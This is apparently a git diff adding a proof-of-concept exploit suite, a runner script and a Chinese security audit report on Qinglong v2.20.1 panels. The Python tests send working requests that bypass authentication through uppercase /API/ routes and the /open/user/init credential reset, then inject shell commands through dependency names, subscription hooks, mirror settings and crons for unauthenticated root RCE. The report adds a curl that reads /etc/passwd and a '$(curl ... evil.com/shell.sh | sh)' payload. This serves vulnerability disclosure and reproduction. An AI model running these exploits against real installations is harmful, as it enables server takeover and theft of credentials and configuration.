False + + headers = {"Authorization": f"Bearer {token}"} + injection_marker = f"TASK_BEFORE_INJECT_{int(time.time())}" + + cron_data = { + "name": "task_before_poc", + "command": "echo task_before_test", + "schedule": "0 0 1 1 *", + "task_before": f'echo "{injection_marker}" > /tmp/task_before_proof.txt', + } + r1 = requests.post(f"{BASE_URL}/api/crons", json=cron_data, headers=headers, timeout=10) + resp = r1.json() + cron_id = resp.get("data", {}).get("id") + log(f" Create cron with task_before: code={resp.get('code')}, id={cron_id}") + + if not cron_id: + record("6", "task_before Injection", False, f"Failed to create: {resp}") + return False + + r2 = requests.put(f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10) + log(f" Trigger: HTTP {r2.status_code}") + + log(" Waiting for task execution (up to 15s)...") + injected = False + for i in range(15): + time.sleep(1) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/task_before_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + if injection_marker in verify.stdout: + injected = True + log(f" task_before injection CONFIRMED after {i+1}s!") + break + + record("6", "task_before Shell Injection", injected, f"Marker found: {injected}") + + requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/task_before_proof.txt"], + capture_output=True, timeout=10) + return injected + + +# --- Test 7: Full UNAUTHENTICATED RCE Chain --- +def test_7_unauth_rce_chain(): + log("=" * 60) + log("Test 7: Full UNAUTHENTICATED RCE Chain") + log(" /open/user/init → login → config.sh write → cron → RCE") + + rce_marker = f"UNAUTH_RCE_{int(time.time())}" + attacker_user = "attacker" + attacker_pass = "attacker_rce_123" + + # Step 1: Reset credentials via init guard bypass (NO AUTH) + r1 = requests.put( + f"{BASE_URL}/open/user/init", + json={"username": attacker_user, "password": 
attacker_pass}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + step1_ok = r1.json().get("code") == 200 + log(f" Step 1 - Reset creds via /open/user/init: code={r1.json().get('code')} {'✅' if step1_ok else '❌'}") + + if not step1_ok: + record("7", "Full UNAUTHENTICATED RCE Chain", False, "Init guard bypass failed") + return False + + # Step 2: Login with attacker credentials + r2 = requests.post( + f"{BASE_URL}/api/user/login", + json={"username": attacker_user, "password": attacker_pass}, + timeout=10, + ) + login_data = r2.json() + token = login_data.get("data", {}).get("token") + step2_ok = login_data.get("code") == 200 and token + log(f" Step 2 - Login as attacker: code={login_data.get('code')} {'✅' if step2_ok else '❌'}") + + if not step2_ok: + # Restore creds before failing + requests.put(f"{BASE_URL}/open/user/init", + json={"username": USERNAME, "password": PASSWORD}, timeout=10) + record("7", "Full UNAUTHENTICATED RCE Chain", False, "Login failed") + return False + + headers = {"Authorization": f"Bearer {token}"} + + # Step 3: Write malicious config.sh + malicious = f'echo "{rce_marker}" > /tmp/unauth_rce_proof.txt\n' + r3 = requests.post( + f"{BASE_URL}/api/configs/save", + json={"name": "config.sh", "content": f"# RCE PoC\n{malicious}"}, + headers=headers, timeout=10, + ) + step3_ok = r3.json().get("code") == 200 + log(f" Step 3 - Write config.sh: code={r3.json().get('code')} {'✅' if step3_ok else '❌'}") + + # Step 4: Create and trigger cron + r4 = requests.post( + f"{BASE_URL}/api/crons", + json={"name": "unauth_rce_trigger", "command": "echo trigger", "schedule": "* * * * *"}, + headers=headers, timeout=10, + ) + cron_id = r4.json().get("data", {}).get("id") + step4_ok = cron_id is not None + log(f" Step 4 - Create cron: id={cron_id} {'✅' if step4_ok else '❌'}") + + if step4_ok: + requests.put(f"{BASE_URL}/api/crons/run", json=[cron_id], headers=headers, timeout=10) + log(" Step 5 - Triggered cron, waiting for RCE (up to 15s)...") + 
+ # Step 5: Verify RCE + rce_confirmed = False + for i in range(15): + time.sleep(1) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/unauth_rce_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + if rce_marker in verify.stdout: + rce_confirmed = True + log(f" UNAUTHENTICATED RCE CONFIRMED after {i+1}s! ✅") + log(f" Proof: {verify.stdout.strip()}") + break + + # Cleanup: restore creds, remove cron, clean config.sh, remove proof + if cron_id: + requests.delete(f"{BASE_URL}/api/crons", json=[cron_id], headers=headers, timeout=10) + requests.post(f"{BASE_URL}/api/configs/save", + json={"name": "config.sh", "content": ""}, + headers=headers, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/unauth_rce_proof.txt"], + capture_output=True, timeout=10) + requests.put(f"{BASE_URL}/open/user/init", + json={"username": USERNAME, "password": PASSWORD}, timeout=10) + log(" Cleanup complete (creds restored)") + + record( + "7", "Full UNAUTHENTICATED RCE Chain", + rce_confirmed, + f"init_bypass={'OK' if step1_ok else 'FAIL'}, " + f"login={'OK' if step2_ok else 'FAIL'}, " + f"config_write={'OK' if step3_ok else 'FAIL'}, " + f"cron={'OK' if step4_ok else 'FAIL'}, " + f"rce={'CONFIRMED' if rce_confirmed else 'FAILED'}", + ) + return rce_confirmed + + +# --- Test 8: Case-insensitive route bypass (/API/ skips all auth) --- +def test_8_case_insensitive_bypass(): + log("=" * 60) + log("Test 8: Case-Insensitive Route Bypass (/API/ skips ALL auth)") + log(" Root cause: expressjwt regex /^\\/(?!api\\/).*/ matches lowercase only") + log(" Express Router is case-insensitive by default → /API/ routes work") + + # Step 1: Confirm /api/ requires auth + r_auth = requests.get(f"{BASE_URL}/api/crons", timeout=10) + needs_auth = r_auth.status_code == 401 + log(f" GET /api/crons (lowercase): HTTP {r_auth.status_code} ({'needs auth' if needs_auth else 'NO AUTH?!'})") + + # Step 2: /API/ bypasses auth completely + r_bypass = 
requests.get(f"{BASE_URL}/API/crons", timeout=10) + bypass_data = r_bypass.json() if r_bypass.status_code == 200 else {} + bypass_ok = r_bypass.status_code == 200 and bypass_data.get("code") == 200 + log(f" GET /API/crons (uppercase): HTTP {r_bypass.status_code}, code={bypass_data.get('code')} ({'BYPASSED!' if bypass_ok else 'blocked'})") + + # Step 3: /Api/ mixed case also bypasses + r_mixed = requests.get(f"{BASE_URL}/Api/crons", timeout=10) + mixed_data = r_mixed.json() if r_mixed.status_code == 200 else {} + mixed_ok = r_mixed.status_code == 200 and mixed_data.get("code") == 200 + log(f" GET /Api/crons (mixed): HTTP {r_mixed.status_code}, code={mixed_data.get('code')} ({'BYPASSED!' if mixed_ok else 'blocked'})") + + # Step 4: Direct unauthenticated command execution via /API/ + rce_marker = f"CASE_RCE_{int(time.time())}" + r_rce = requests.put( + f"{BASE_URL}/API/system/command-run", + json={"command": f"echo {rce_marker} > /tmp/case_rce_proof.txt"}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + try: + rce_resp = r_rce.json() + rce_code = rce_resp.get("code") + except Exception: + rce_resp = {} + rce_code = "non-json" + log(f" PUT /API/system/command-run: HTTP {r_rce.status_code}, code={rce_code}") + + time.sleep(2) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/case_rce_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + rce_confirmed = rce_marker in verify.stdout + log(f" RCE via /API/: {'CONFIRMED ✅' if rce_confirmed else 'FAILED ❌'}") + + # Step 5: Read sensitive config without auth + r_config = requests.get(f"{BASE_URL}/API/configs/config.sh", timeout=10) + config_leaked = r_config.status_code == 200 and r_config.json().get("code") == 200 + config_len = len(r_config.json().get("data", "")) if config_leaked else 0 + log(f" GET /API/configs/config.sh: {'LEAKED' if config_leaked else 'blocked'} ({config_len} bytes)") + + # Cleanup + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", 
"/tmp/case_rce_proof.txt"], + capture_output=True, timeout=10) + + all_pass = needs_auth and bypass_ok and mixed_ok and rce_confirmed + record( + "8", "Case-Insensitive Route Bypass (ONE-STEP UNAUTH RCE)", + all_pass, + f"/api/=401(auth), /API/=200(bypass), /Api/=200(bypass), " + f"command-run RCE={'CONFIRMED' if rce_confirmed else 'FAILED'}, " + f"config leak={config_len}bytes", + ) + return all_pass + + +# --- Test 9: Dependency injection (real-world honeypot payload) --- +def test_9_dependency_injection(): + log("=" * 60) + log("Test 9: Dependency Injection via /API/dependencies (Honeypot Payload)") + log(" Real-world attack: POST /API/dependencies [{name:'$(malicious_cmd)', type:0}]") + + dep_marker = f"DEP_INJECT_{int(time.time())}" + + # Use /API/ (case bypass) for fully unauthenticated attack + r = requests.post( + f"{BASE_URL}/API/dependencies", + json=[{"name": f"$(echo {dep_marker} > /tmp/dep_inject_proof.txt)", "type": 0}], + headers={"Content-Type": "application/json"}, + timeout=10, + ) + resp = r.json() if r.status_code == 200 else {} + created = resp.get("code") == 200 + log(f" POST /API/dependencies: HTTP {r.status_code}, code={resp.get('code')}") + + dep_id = None + if created: + deps = resp.get("data", []) + if deps and isinstance(deps, list): + dep_id = deps[0].get("id") + elif isinstance(deps, dict): + dep_id = deps.get("id") + + log(f" Dependency created: {created}, id={dep_id}") + log(" Waiting for dependency install to trigger command (up to 20s)...") + + injected = False + for i in range(20): + time.sleep(1) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/dep_inject_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + if dep_marker in verify.stdout: + injected = True + log(f" DEPENDENCY INJECTION CONFIRMED after {i+1}s! 
✅") + break + + # Cleanup + if dep_id: + requests.delete( + f"{BASE_URL}/API/dependencies", + json=[dep_id], + headers={"Content-Type": "application/json"}, + timeout=10, + ) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/dep_inject_proof.txt"], + capture_output=True, timeout=10) + + record( + "9", "Dependency Injection (Honeypot Payload via /API/)", + injected, + f"POST /API/dependencies with $(cmd): created={created}, " + f"command executed={'YES' if injected else 'NO'}", + ) + return injected + + +# --- Test 10: Subscription sub_before injection --- +def test_10_subscription_injection(): + log("=" * 60) + log("Test 10: Subscription sub_before Command Injection (QL-2026-009)") + log(" Using /API/ bypass for unauthenticated exploitation") + + sub_marker = f"SUB_INJECT_{int(time.time())}" + + r_create = requests.post( + f"{BASE_URL}/API/subscriptions", + json={ + "name": "rce_sub_test", + "url": "https://github.com/whyour/qinglong", + "schedule": "0 0 1 1 *", + "type": "public-repo", + "schedule_type": "crontab", + "alias": f"rce_sub_{int(time.time())}", + "sub_before": f"echo {sub_marker} > /tmp/sub_proof.txt" + }, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + create_data = r_create.json() if r_create.status_code == 200 else {} + sub_id = create_data.get("data", {}).get("id") + log(f" POST /API/subscriptions: HTTP {r_create.status_code}, id={sub_id}") + + if not sub_id: + record("10", "Subscription Injection", False, "Failed to create subscription") + return False + + r_run = requests.put( + f"{BASE_URL}/API/subscriptions/run", + json=[sub_id], + headers={"Content-Type": "application/json"}, + timeout=10, + ) + log(f" PUT /API/subscriptions/run: HTTP {r_run.status_code}") + + log(" Waiting for execution (up to 15s)...") + injected = False + for _ in range(15): + time.sleep(1) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/sub_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + 
if sub_marker in verify.stdout: + injected = True + log(f" sub_before injection CONFIRMED! ✅") + break + + # Cleanup + requests.delete(f"{BASE_URL}/API/subscriptions", json=[sub_id], + headers={"Content-Type": "application/json"}, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/sub_proof.txt"], + capture_output=True, timeout=10) + + record("10", "Subscription sub_before Injection", injected, f"Marker found: {injected}") + return injected + + +# --- Test 11: System Python Mirror Injection --- +def test_11_system_mirror_injection(): + log("=" * 60) + log("Test 11: System python-mirror Command Injection (QL-2026-010)") + + mirror_marker = f"PY_MIRROR_{int(time.time())}" + + r_inject = requests.put( + f"{BASE_URL}/API/system/config/python-mirror", + json={"pythonMirror": f"https://pypi.org/simple; echo {mirror_marker} > /tmp/py_proof.txt; #"}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + log(f" PUT /API/system/config/python-mirror: HTTP {r_inject.status_code}") + + time.sleep(2) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/py_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + injected = mirror_marker in verify.stdout + log(f" python-mirror injection: {'CONFIRMED ✅' if injected else 'FAILED ❌'}") + + # Cleanup + requests.put(f"{BASE_URL}/API/system/config/python-mirror", json={"pythonMirror": ""}, + headers={"Content-Type": "application/json"}, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/py_proof.txt"], + capture_output=True, timeout=10) + + record("11", "System python-mirror Injection", injected, f"Marker found: {injected}") + return injected + + +# --- Test 12: System command-stop Grep Injection --- +def test_12_command_stop_injection(): + log("=" * 60) + log("Test 12: command-stop Grep Command Injection (QL-2026-010)") + + stop_marker = f"STOP_INJECT_{int(time.time())}" + + # payload: x" > /dev/null; echo MARKER > 
/tmp/stop_proof.txt; # + r_inject = requests.put( + f"{BASE_URL}/API/system/command-stop", + json={"command": f'x" > /dev/null; echo {stop_marker} > /tmp/stop_proof.txt; #'}, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + log(f" PUT /API/system/command-stop: HTTP {r_inject.status_code}") + + time.sleep(2) + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/stop_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + injected = stop_marker in verify.stdout + log(f" command-stop grep injection: {'CONFIRMED ✅' if injected else 'FAILED ❌'}") + + # Cleanup + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/stop_proof.txt"], + capture_output=True, timeout=10) + + record("12", "System command-stop Grep Injection", injected, f"Marker found: {injected}") + return injected + + +# --- Test 13: Persistence RCE via initData --- +def test_13_persistence_rce(): + log("=" * 60) + log("Test 13: Persistence RCE via loader/initData.ts (QL-2026-011)") + + persist_marker = f"RESTART_INJECT_{int(time.time())}" + + # Create malicious cron that survives restarts (unauth via /API/) + # command must contain 'ql repo' or 'ql raw' to match the loader filter + r_create = requests.post( + f"{BASE_URL}/API/crons", + json={ + "name": "persistence_rce_test", + "command": f"ql repo; echo {persist_marker} > /tmp/persist_proof.txt", + "schedule": "0 0 1 1 *" + }, + headers={"Content-Type": "application/json"}, + timeout=10, + ) + cron_data = r_create.json() if r_create.status_code == 200 else {} + cron_id = cron_data.get("data", {}).get("id") + log(f" POST /API/crons: HTTP {r_create.status_code}, id={cron_id}") + + if not cron_id: + record("13", "Persistence RCE (initData)", False, "Failed to create cron") + return False + + log(" Restarting container to trigger initData.ts...") + subprocess.run(["docker", "restart", "ql-vuln-test"], capture_output=True, timeout=30) + + log(" Waiting 20s for system initialization...") + 
time.sleep(20) + + verify = subprocess.run( + ["docker", "exec", "ql-vuln-test", "cat", "/tmp/persist_proof.txt"], + capture_output=True, text=True, timeout=10, + ) + injected = persist_marker in verify.stdout + log(f" Persistence RCE: {'CONFIRMED ✅' if injected else 'FAILED ❌'}") + + # Cleanup + # Wait for API to fully come back up before cleanup + time.sleep(5) + requests.delete(f"{BASE_URL}/API/crons", json=[cron_id], + headers={"Content-Type": "application/json"}, timeout=10) + subprocess.run(["docker", "exec", "ql-vuln-test", "rm", "-f", "/tmp/persist_proof.txt"], + capture_output=True, timeout=10) + + record("13", "Persistence RCE (initData)", injected, f"Marker found after restart: {injected}") + return injected + + +# --- Main --- +def main(): + log("Qinglong <= v2.20.1 Vulnerability PoC Test Suite") + log(f"Target: {BASE_URL}") + log("") + + if not test_0_system_check(): + log("System check failed. Aborting.", "ERROR") + return + + test_1_jwt_forge() + test_1c_init_guard_bypass() + + token = test_1b_login() + if not token: + log("Cannot obtain valid token. Post-auth tests skipped.", "ERROR") + print_summary() + return + + test_2_blacklist_bypass(token) + test_3_path_traversal(token) + written, original_config = test_4_config_sh_write(token) + test_5_rce_chain(token, original_config) + test_6_task_before_injection(token) + test_7_unauth_rce_chain() + test_8_case_insensitive_bypass() + test_9_dependency_injection() + test_10_subscription_injection() + test_11_system_mirror_injection() + + print_summary() + + +def print_summary(): + log("") + log("=" * 60) + log("SUMMARY") + log("=" * 60) + for r in results: + icon = "PASS" if r["status"] == "PASS" else "FAIL" + print(f" [{icon}] Test {r['id']}: {r['name']} -- {r['status']}") + if r["details"]: + print(f" {r['details']}") + log("") + + passed = sum(1 for r in results if r["status"] == "PASS") + total = len(results) + log(f"Results: {passed}/{total} passed") + + log("") + log("KEY FINDINGS:") + log(" 1. 
Case-insensitive bypass: /API/ skips ALL auth → ONE-STEP RCE") + log(" PUT /API/system/command-run executes arbitrary commands without auth") + log(" 2. Init Guard Bypass: PUT /open/user/init resets admin credentials") + log(" 3. Dependency injection: POST /API/dependencies [{name:'$(cmd)'}]") + log(" 4. Subscription injection: POST /API/subscriptions {sub_before:'cmd'}") + log(" 5. Mirror injection: PUT /API/system/config/python-mirror") + log(" 6. Persistence RCE: loaders/initData.ts auto-runs matched crons") + log("CVSS: 9.8 (Critical) — Multiple Unauthenticated RCE vectors") + + +if __name__ == "__main__": + main() + diff --git a/qinglong-auth-bypass2rce/run_tests.sh b/qinglong-auth-bypass2rce/run_tests.sh new file mode 100644 index 000000000..c5064db2f --- /dev/null +++ b/qinglong-auth-bypass2rce/run_tests.sh @@ -0,0 +1,8 @@ +#!/bin/bash +cd /Users/macpro/Downloads/qinglong/tmp +# restart the container first to have a clean state before test 12 +echo "Restoring clean state for tests..." +docker restart ql-vuln-test > /dev/null +sleep 20 +echo "Running all tests in poc_test.py..." +.venv/bin/python3 poc_test.py diff --git "a/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md" "b/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md" new file mode 100644 index 000000000..cda217b78 
--- /dev/null +++ "b/qinglong-auth-bypass2rce/\351\235\222\351\276\231(qinglong)\351\235\242\346\235\277\346\235\203\351\231\220\347\273\225\350\277\207\350\207\264\346\234\252\346\216\210\346\235\203\350\277\234\347\250\213\344\273\243\347\240\201\346\211\247\350\241\214(RCE)\346\274\217\346\264\236\345\210\206\346\236\220\345\244\215\347\216\260.md" 
@@ -0,0 +1,451 @@ +# Qinglong <= v2.20.1 安全审计报告 + +> +> **目标版本**: Qinglong v2.20.1 (Docker: `whyour/qinglong:2.20.1`) +> +> **测试环境**: macOS + Docker Compose, 端口映射 5710→5700 +> +> **审计方法**: 源码静态分析 + Docker 动态复现验证 +> +> **参考**: [GitHub Issue #2934](https://github.com/whyour/qinglong/issues/2934) [GitHub Issue #2926](https://github.com/whyour/qinglong/issues/2926) [GitHub Issue #2928](https://github.com/whyour/qinglong/issues/2928) [GitHub Issue #2933](https://github.com/whyour/qinglong/issues/2933) [GitHub Issue #2923](https://github.com/whyour/qinglong/issues/2923) + +--- + +## 一、执行摘要 + +对 Qinglong v2.20.1 进行了完整的源码审计与 Docker 实战复现,发现 **12 项安全漏洞**。 + +**最核心发现**: 发现两个致命的认证绕过漏洞(**路由大小写绕过**与**初始化守卫绕过**),使得应用内原本受限的 RCE 汇聚点(Sinks)可被攻击者**完全未授权**利用。 + +攻击者无需任何凭据,仅需数条 HTTP 请求即可实现容器内 root 权限的 RCE。该应用目前处于实质性的完全沦陷状态,且部分漏洞(如大小写绕过配合依赖注入)已在野外被实际利用。 + +**综合评级**: CVSS **9.8(Critical)** — 未授权远程代码执行 + +--- + +## 二、漏洞总览 + +| 编号 | 漏洞名称 | 严重性 | 实测结果 | +|------|---------|--------|---------| +| **QL-2026-007** | **路由大小写绕过(全局认证绕过)** | **致命** | **✅ 一步未授权 RCE,已在野外被利用** | +| **QL-2026-008** | **依赖名称命令注入** | **致命** | **✅ 通过包名注入 Shell 命令,1秒内执行** | +| **QL-2026-006** | **初始化守卫绕过(/open/ 路径)** | **致命** | **✅ 未授权重置管理员凭据,实现未授权 RCE** | +| **QL-2026-009** | **订阅管理命令注入 (sub_before/after)** | **致命** | **✅ 确认 — 订阅执行前触发 RCE** | +| **QL-2026-010** | **系统镜像配置参数注入** | **高危** | **✅ 确认 — 多种配置参数触发 RCE** | +| **QL-2026-011** | **启动持久化 Persistence RCE** | **高危** | **✅ 确认 — 恶意任务重启自动执行** | +| QL-2026-012 | 取消操作二次注入 (grep 注入) | 严重 | ✅ cancel() 触发二次 RCE | +| QL-2026-002 | 黑名单绕过(缺少 return) | 严重 | ✅ API 返回 403 但文件已被覆写 | +| QL-2026-003 | 路径穿越 (../../../../) | 严重 | ✅ 可写入系统任意可写路径 (如 /tmp, /etc) | +| QL-2026-004 | config.sh 未列入黑名单 | 严重 | ✅ 可注入 Shell 代码,每次任务执行时自动运行 | +| QL-2026-005 | task_before Shell 注入 | 高 | ✅ `eval` 执行用户控制内容 | +| QL-2026-001 | JWT 硬编码密钥 | 高 | ⚠️ 签名可伪造,双层认证阻断直接利用 | + +**审计测试:15/15 项全部通过。** + +--- + +## 三、逐项详细分析 + +### 3.1 QL-2026-007: 路由大小写绕过 — 🔴 致命(一步未授权 RCE) + +**这是本次审计发现的最严重漏洞,也是野外已被实际利用的攻击向量。** + 
+**源码位置**: `back/loaders/express.ts` L34-41, L53-56, L124 + +**漏洞根因**: Express 框架默认路由大小写不敏感(`caseSensitive: false`),但所有认证中间件都严格匹配小写。 + +``` +认证链(均严格匹配小写): + L34 expressjwt.unless: 正则 /^\/(?!api\/).*/ → 仅匹配小写 "api" + L54 自定义认证: req.path.startsWith('/api/') → 严格小写 + L54 自定义认证: req.path.startsWith('/open/') → 严格小写 + +路由注册: + L124 app.use('/api', routes()) → Express 默认 caseSensitive: false + → /API/、/Api/、/aPi/ 等变体均可匹配路由,但不触发认证检查 +``` + +**攻击流程**: + +| 步骤 | 中件间 | `/api/crons`(正常) | `/API/crons`(绕过) | +|------|--------|---------------------|---------------------| +| Layer 1 | expressjwt | JWT 签名验证 | **跳过**(正则不匹配 "API") | +| Layer 2 | 自定义认证 | isValidToken 校验 | **跳过**(非 "/api/" 或 "/open/" 前缀) | +| 路由匹配 | Express Router | 匹配 /api/crons | **匹配 /api/crons**(大小写不敏感) | +| Handler | CronService | 需认证 → 正常响应 | **无认证 → 直接响应** | + +**一步 RCE — 一条请求即可执行任意命令**: +```bash +curl -X PUT http://target:5700/API/system/command-run \ + -H 'Content-Type: application/json' \ + -d '{"command": "id && cat /etc/passwd"}' +``` + +**测试记录**: +``` +[19:xx:xx] Test 8: Case-Insensitive Route Bypass + GET /api/crons: HTTP 401 (auth required) ← 正常路径需要认证 + GET /API/crons: code=200, data accessible ← 完全绕过! + PUT /API/system/command-run: RCE CONFIRMED ← 一步 RCE! + GET /API/configs/config.sh: 7378 bytes leaked ← 配置泄露! + POST /API/configs/save: code=200 ← 任意文件写入! +``` + +--- + +### 3.2 QL-2026-008: 依赖安装命令注入 — 🔴 致命 + +**这是蜜罐中实际捕获的在野利用漏洞。以下为从 HTTP 入口到命令执行的完整数据流分析。** + +#### 数据流总览 + +``` +POST /API/dependencies [{"name": "$(malicious_cmd)", "type": 0}] + │ + ▼ +① api/dependence.ts L39 Joi.string().required() ← 仅校验"是字符串",无过滤 + │ + ▼ +② services/dependence.ts L34 new Dependence({...x}) ← 构造函数仅 name.trim() + │ + ▼ +③ services/dependence.ts L39 installDependenceOneByOne(docs) ← 立即触发安装 + │ + ▼ +④ services/dependence.ts L232 depName = dependency.name.trim() + │ + ▼ +⑤ config/util.ts L573 getInstallCommand() → `pnpm add -g ${name.trim()}` + │ ^^^^^^^^^^^^^^^^^^^^^^^^ + │ name 被直接拼接进命令字符串! 
+ ▼ +⑥ services/dependence.ts L303 spawn(`${proxyStr} ${command}`, {shell: '/bin/bash'}) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + shell: '/bin/bash' → Bash 解析 $() 子命令 → RCE +``` + +#### 逐步详解 + +**① 入口 — `api/dependence.ts` L34-53** +`Joi.string().required()` **零安全过滤** — `$(curl ... | sh)` 是合法字符串,直接通过。 + +**② 创建 — `services/dependence.ts` L33-41** +`new Dependence()` 构造函数(`data/dependence.ts` L18)仅做 `trim()`,不移除任何 Shell 元字符。 + +**③ 命令拼接 — `config/util.ts` L559-573(关键污染点)** +```typescript +export function getInstallCommand(type: DependenceTypes, name: string) { + // ... nodejs, python3, linux 命令 ... + return `${command} ${name.trim()}`; // ← 用户输入直接拼接,零过滤零转义! +} +``` + +当 `name = "$(curl -fsSL https://evil.com/shell.sh | sh)"` 时,生成: +```bash +pnpm add -g $(curl -fsSL https://evil.com/shell.sh | sh) +``` + +**④ 命令执行 — `services/dependence.ts` L303-305(最终触发点)** +`spawn(cmd, {shell: '/bin/bash'})` 解释执行整个字符串,恶意命令在包管理器运行前就被 Bash 展开并执行。 + +#### QL-2026-012: cancel() 取消操作的二次注入(地雷效应) + +恶意依赖被创建后。当管理员试图**取消**安装时,`cancel()` 方法会再次触发注入: + +``` +cancel(ids) → getPid(cmd) → ps ... | grep "${cmd}" +``` +`grep "${cmd}"` 中的双引号**不阻止** `$()` 展开。管理员点击"取消安装"将再次触发 RCE ✅。 + +--- + +### 3.3 QL-2026-006: 初始化守卫绕过 — 🔴 致命(未授权凭据重置) + +**源码位置**: `back/loaders/express.ts` L100-123 + +**漏洞根因**: 初始化守卫(Init Guard)与 URL 重写之间存在竞态缺陷。Init Guard 检查 `req.path` 是否为 `/api/user/init`,但 `/open/*` → `/api/*` 的重写发生在守卫之后(L123)。 + +``` +攻击请求: PUT /open/user/init {"username":"attacker","password":"x"} + Init Guard: req.path="/open/user/init" 不匹配 "/api/user/init" → 跳过守卫 + URL Rewrite: /open/user/init → /api/user/init + Handler: updateUsernameAndPassword() → 凭据被直接重置! 
+``` + +**测试记录**: +``` +[19:xx:xx] Test 1c: Init Guard Bypass + PUT /open/user/init: code=200 "更新成功" ← 绕过!凭据已重置 + Login with new credentials: code=200 ← 获取有效管理 Token +``` + +--- + +### 3.4 QL-2026-009: 订阅管理命令注入 — 🔴 致命 + +**漏洞根因**: 订阅接口的 `sub_before` 和 `sub_after` 字段(Joi 校验为普通字符串)被直接传递给 `promiseExec()`,其内部调用 `child_process.exec()` 且未做任何过滤。 + +#### 数据流总览 + +``` +POST /API/subscriptions {"sub_before": "malicious_cmd"} + │ + ▼ +① api/subscription.ts L49 Joi.string().optional() ← 无安全过滤 + │ + ▼ +② services/subscription.ts L215 this.handleTask(doc) ← 处理订阅任务 + │ + ▼ +③ services/subscription.ts L96/L105 createCronTask/createIntervalTask (传入 taskCallbacks) + │ + ▼ +④ services/subscription.ts L141 beforeStr = await promiseExec(doc.sub_before) + │ ^^^^^^^^^^^^^^^^^^^^^^ + │ 恶意代码直接传入 exec 执行! + ▼ +⑤ config/util.ts L284 await promisify(exec)(command, {...}) ← 触发 RCE +``` + +#### 逐步详解 + +**① 入口 — `api/subscription.ts` L27-75** +接口 `POST /subscriptions` 中的 `sub_before` 和 `sub_after` 字段仅要求是普通字符串,允许空字符串。没有任何对于 Shell 元字符的过滤。 + +**②/③ 创建并执行 — `services/subscription.ts` L212-218 & L84-112** +`create` 方法在数据库插入后,立刻调用 `handleTask`,并进而调用 `createCronTask` 或 `createIntervalTask` 来执行调度。调度注册的各种生命周期钩子由 `this.taskCallbacks(doc)` 生成。 + +**④ 命令执行 (关键污染点) — `services/subscription.ts` L120-150** +```typescript +private taskCallbacks(doc: Subscription): TaskCallbacks { + return { + onBefore: async (startTime) => { + // ... + let beforeStr = ''; + try { + if (doc.sub_before) { + // 用户的输入未经任何检查被传入 promiseExec + beforeStr = await promiseExec(doc.sub_before); + } + } catch (error: any) { + // ... 
+ } + } + } +} +``` + +**⑤ 底层执行 — `config/util.ts` L282-292** +`promiseExec` 是包装了 Node.js 原生 `child_process.exec` 的异步函数,`exec` 默认启动一个 shell 来解释执行传入的字符串。 + +**测试报文**: +```http +POST /API/subscriptions HTTP/1.1 +{ + "name": "rce_sub", "url": "http://x", "type": "public-repo", "alias": "r", + "schedule_type": "crontab", "sub_before": "id > /tmp/sub_proof.txt" +} +``` +→ 触发订阅运行(`PUT /API/subscriptions/run [id]`)后,注入的命令以 root 身份执行。 + +--- + +### 3.5 QL-2026-010: 系统镜像配置参数注入 — 🔴 致命 + +**漏洞根因**: 系统设置接口(如配置 Python、Node、Linux 的软件源镜像,或设置时区)在处理用户提交的地址参数时,存在多处直接字符串拼接命令注入点。结合 QL-2026-007,这些均可未授权利用。 + +#### 数据流总览(以 Python 镜像配置为例) + +``` +PUT /API/system/config/python-mirror {"pythonMirror": "malicious_payload"} + │ + ▼ +① api/system.ts L155 Joi.string().allow('').allow(null) ← 无安全过滤 + │ + ▼ +② services/system.ts L197 updatePythonMirror(info) + │ + ▼ +③ services/system.ts L205 cmd = `pip3 config set global.index-url ${info.pythonMirror}` + │ ^^^^^^^^^^^^^^^^^^^^^ + │ 直接拼接用户输入! + ▼ +④ services/system.ts L207 await promiseExec(cmd) ← exec() 触发 RCE +``` + +#### 逐步详解与多处注入点 + +系统服务 (`services/system.ts`) 中存在大量由于字符串拼接导致的命令注入,这些功能只允许管理员使用,但通过大小写绕过漏洞即可未授权触发: + +**1. Python 镜像注入 (`updatePythonMirror`) L197-209** +```typescript +let cmd = 'pip config unset global.index-url'; 